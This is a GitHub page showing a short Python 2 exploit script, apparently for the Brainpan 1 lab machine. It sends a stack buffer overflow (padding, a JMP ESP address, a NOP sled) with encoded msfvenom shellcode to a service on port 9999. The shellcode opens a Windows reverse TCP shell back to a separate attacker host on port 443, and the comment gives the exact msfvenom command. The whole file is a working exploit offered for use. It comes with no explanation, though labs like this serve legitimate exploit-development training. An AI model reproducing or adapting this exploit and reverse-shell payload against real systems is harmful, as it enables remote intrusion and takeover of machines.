-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathbrainpan1-shell.py
More file actions
49 lines (43 loc) · 2.38 KB
/
brainpan1-shell.py
File metadata and controls
49 lines (43 loc) · 2.38 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/python
import sys,socket
esp = "\xF3\x12\x17\x31" #JMP ESP adress in littleendian format
nops = "\x90"*16
shellcode = ""
shellcode += "\xda\xdf\xd9\x74\x24\xf4\xb8\x34\xec\x2c\xdd\x5b"
shellcode += "\x31\xc9\xb1\x52\x31\x43\x17\x83\xc3\x04\x03\x77"
shellcode += "\xff\xce\x28\x8b\x17\x8c\xd3\x73\xe8\xf1\x5a\x96"
shellcode += "\xd9\x31\x38\xd3\x4a\x82\x4a\xb1\x66\x69\x1e\x21"
shellcode += "\xfc\x1f\xb7\x46\xb5\xaa\xe1\x69\x46\x86\xd2\xe8"
shellcode += "\xc4\xd5\x06\xca\xf5\x15\x5b\x0b\x31\x4b\x96\x59"
shellcode += "\xea\x07\x05\x4d\x9f\x52\x96\xe6\xd3\x73\x9e\x1b"
shellcode += "\xa3\x72\x8f\x8a\xbf\x2c\x0f\x2d\x13\x45\x06\x35"
shellcode += "\x70\x60\xd0\xce\x42\x1e\xe3\x06\x9b\xdf\x48\x67"
shellcode += "\x13\x12\x90\xa0\x94\xcd\xe7\xd8\xe6\x70\xf0\x1f"
shellcode += "\x94\xae\x75\xbb\x3e\x24\x2d\x67\xbe\xe9\xa8\xec"
shellcode += "\xcc\x46\xbe\xaa\xd0\x59\x13\xc1\xed\xd2\x92\x05"
shellcode += "\x64\xa0\xb0\x81\x2c\x72\xd8\x90\x88\xd5\xe5\xc2"
shellcode += "\x72\x89\x43\x89\x9f\xde\xf9\xd0\xf7\x13\x30\xea"
shellcode += "\x07\x3c\x43\x99\x35\xe3\xff\x35\x76\x6c\x26\xc2"
shellcode += "\x79\x47\x9e\x5c\x84\x68\xdf\x75\x43\x3c\x8f\xed"
shellcode += "\x62\x3d\x44\xed\x8b\xe8\xcb\xbd\x23\x43\xac\x6d"
shellcode += "\x84\x33\x44\x67\x0b\x6b\x74\x88\xc1\x04\x1f\x73"
shellcode += "\x82\xea\x48\x7a\x90\x83\x8a\x7c\x15\xef\x02\x9a"
shellcode += "\x7f\x1f\x43\x35\xe8\x86\xce\xcd\x89\x47\xc5\xa8"
shellcode += "\x8a\xcc\xea\x4d\x44\x25\x86\x5d\x31\xc5\xdd\x3f"
shellcode += "\x94\xda\xcb\x57\x7a\x48\x90\xa7\xf5\x71\x0f\xf0"
shellcode += "\x52\x47\x46\x94\x4e\xfe\xf0\x8a\x92\x66\x3a\x0e"
shellcode += "\x49\x5b\xc5\x8f\x1c\xe7\xe1\x9f\xd8\xe8\xad\xcb"
shellcode += "\xb4\xbe\x7b\xa5\x72\x69\xca\x1f\x2d\xc6\x84\xf7"
shellcode += "\xa8\x24\x17\x81\xb4\x60\xe1\x6d\x04\xdd\xb4\x92"
shellcode += "\xa9\x89\x30\xeb\xd7\x29\xbe\x26\x5c\x49\x5d\xe2"
shellcode += "\xa9\xe2\xf8\x67\x10\x6f\xfb\x52\x57\x96\x78\x56"
shellcode += "\x28\x6d\x60\x13\x2d\x29\x26\xc8\x5f\x22\xc3\xee"
shellcode += "\xcc\x43\xc6"
#msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.1.194 LPORT=443 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode
payload = "A"*524 + esp + nops + shellcode
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.100',9999))
print s.recv(1024)
s.send(payload)
print s.recv(1024)
s.close()